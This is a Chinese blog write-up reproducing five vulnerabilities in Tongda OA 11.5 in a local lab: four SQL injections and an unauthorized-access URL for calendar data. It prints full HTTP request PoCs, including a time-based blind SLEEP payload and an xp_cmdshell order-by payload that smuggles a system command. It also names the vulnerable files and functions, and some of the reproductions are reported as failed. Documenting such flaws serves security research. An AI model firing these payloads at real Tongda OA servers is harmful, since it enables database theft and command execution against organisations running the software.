通达OA多枚0day漏洞复现
刚刚群里发了一篇文章-研究复现一波,通达OA多枚0day漏洞poc出来了。
影响范围:通达OA11.5版本
![v2-91eb8297f26e4b8585d9ccb18efa7245_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/7bc5263eef82a5704e7adb24a98e84e8.jpeg)
一、环境搭建:
安装11.5版本
![v2-5ca754dc192ca93e9ebc54c3051d4646_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/543a43305a5309520547eda7eb0e4dbb.jpeg)
![v2-1482e390a5e213d6a2e290b76b244029_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/3c88dcb90d452138f7a0a896ea112095.jpeg)
![v2-403114334b7777357618f92bd7719f7d_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/2a55f93242dd2f7416bfda729ae26ef1.jpeg)
![v2-be7b6a70bb78f3ca7bb5f0b7a5780bd6_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/f2af77d046c8730212fa3179085be9d7.jpeg)
安装完成:
![v2-54c005f1c52d4277ce1b1d33c165e9b5_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/caeda38f70140b91a67885e7af21e4d9.jpeg)
服务器配置:
![v2-1c3d535b86d5ba5678344ed2cd1f5540_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/3fed5170d86b9368f2d43664765ddbaa.jpeg)
![v2-8b059ffffcb53bbaf18e194a5d8ac1ef_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/5649e93e71b6d34b12445aa4c52d2f4f.jpeg)
访问IP服务正常:
![v2-68d91e2c406c02d2bd59d245fd0d93dc_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/4d80e07f44b53b89de2ce59d2363b5b1.jpeg)
成功登录系统:
![v2-bc7f274ddb3d7331a6db9072a51bd2e6_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/105f5c247d21c0d472773470e77047a4.jpeg)
二、漏洞验证复现
漏洞一:SQL注入 POC:
POST/general/appbuilder/web/calendar/calendarlist/getcallistHTTP/1.1
问题关键参数:starttime=12&endtime=15&view=month&condition=1
P
OST/general/appbuilder/web/calendar/calendarlist/getcallistHTTP/1.1Host: 192.168.0.107User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Connection: closeCookie: PHPSESSID=rsgpd6j2u0a2qsqbjilv1nln44; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=81d423f8Upgrade-Insecure-Requests: 1Content-Length: 152starttime=12&endtime=15&view=month&condition=1
starttime=AND (SELECT[RANDNUM]FROM(SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])---&endtime=1598918400&view=month&condition=1
详细的注入参数点:
![v2-15138a63f97ce8755a0a5a95c90c309e_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/8b0cab89290ce3e2e4d5cf89631643b2.jpeg)
sqlmap验证:
![v2-04e4d42811d21f1103b76a75720d9baa_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/1e3904a1dbd6199fd99fed1aa7abcf74.jpeg)
漏洞文件:
webroot\general\appbuilder\modules\calendar\models\Calendar.php。
漏洞二:SQL注入 POC:
GET/general/email/sentbox/get_index_data.php?asc=0&boxid=&boxname=sentbox&curnum=3&emailtype=ALLMAIL&keyword=admint&orderby=execmasterxp_cmshell'ping127.0.0.1'--&pagelimit=20&tag=×tamp=1598069133&total=HTTP/1.1
问题关键参数:orderby
GET/general/email/sentbox/get_index_data.php?asc=0&boxid=&boxname=sentbox&curnum=3&emailtype=ALLMAIL&keyword=admint&orderby=execmasterxp_cmshell'ping127.0.0.1'--&pagelimit=20&tag=×tamp=1598069133&total=HTTP/1.1Host:192.168.0.107User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Connection: closeCookie: PHPSESSID=rsgpd6j2u0a2qsqbjilv1nln44; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=81d423f8Upgrade-Insecure-Requests: 1
手工注入闭合报错:
![v2-b9079f81a8dafa17c9e2e24ae39460cb_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/a7d66605977fe29e23e37425146301a2.jpeg)
burp参数查询,回现报错
sqlmap验证,(多次跑了一下)未验证成功。可以试试其他版本。
漏洞文件:webroot\inc\utility_email.php,get_sentbox_data函数接收传入参数未过滤,直接拼接在order by后面了造成注入。
漏洞三:SQL注入 POC:
GET/general/email/inbox/get_index_data.php?asc=0&boxid=&boxname=inbox&curnum=0&emailtype=ALLMAIL&keyword=&orderby=3--&pagelimit=10&tag=×tamp=1598069103&total=HTTP/1.1
问题关键参数:orderby
GET/general/email/inbox/get_index_data.php?asc=0&boxid=&boxname=inbox&curnum=0&emailtype=ALLMAIL&keyword=&orderby=3--&pagelimit=10&tag=×tamp=1598069103&total=HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://192.168.43.169Cookie: PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ffAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip,deflateHost: 192.168.43.169User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36Connection: close
手工注入闭合报错:
![v2-684744447804527a88529759083cb8b6_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/5dfd9708c57b2403d3db24c3324e29cf.jpeg)
burp参数查询,回现报错
sqlmap验证,(多次跑了一下)未验证成功。可以试试其他版本。
漏洞文件:webroot\inc\utility_email.php,get_email_data函数传入参数未过滤,直接拼接在order by后面了造成注入。
漏洞三和漏洞四,参数结果一样可能是这个影响,本地验证未成功。(个人复现情况)
开始看见sql注入2和sql注入3,我以为是是一样的,详细看了还是有差别,功能点参数相似。
![v2-b916e29f8c8b5597c99cff2d22bbf9dc_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/182b6294dcc65bbcdbc82456a73e2517.jpeg)
漏洞四:SQL注入 POC:
GET/general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2HTTP/1.1
问题关键参数:id
GET/general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://192.168.43.169Cookie: PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ffAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip,deflateHost: 192.168.43.169User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36Connection: close
本地的数据库,相关信息不多
![v2-98ac8f034a2dd06de558d9faf59b358f_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/6ad22a017d87ac8d857c9fece0d34506.jpeg)
sqlmap验证:
![v2-5939ce6988b07d4391775825559f0d5e_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/be18ad30279f572014f21ba76468bc9c.jpeg)
漏洞文件:webroot\general\appbuilder\modules\report\controllers\RepdetailController.php,actionEdit函数中存在 一个$_GET["id"]; 未经过滤,拼接到SQL查询中,造成了SQL注入。
漏洞五:未授权访问:
http://127.0.0.1/general/calendar/arrange/get_cal_list.php?starttime=1595779200&endtime=1599408000&view=agendaDay
本地参数没有成功:可能是本地的环境是刚刚搭建,本地的时间没有相关的数据。
![v2-3393db6b30638ce66ee32deb21d4d193_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/280eedd83ebc7e956eeb4e178bd40907.png)
再次确认问题点:未授权访问各种会议通知信息,由于本地的环境是新的没有相关的,没有相关的会议消息,所以不能访问到数据。
参考文章:
安译Sec(https://mp.weixin.qq.com/s/3bI7v-hv4rMUnCIT0GLkJA)
免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
订阅查看更多复现文章、学习笔记
thelostworld
安全路上,与你并肩前行!!!!
![v2-c80c87cb78cf66222785b2baa2a6c6f9_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/5f7a244154469b63d422fd5f6172513a.png)
个人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns
个人简书:https://www.jianshu.com/u/bf0e38a8d400
个人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html
原文链接:
通达OA多枚0day漏洞复现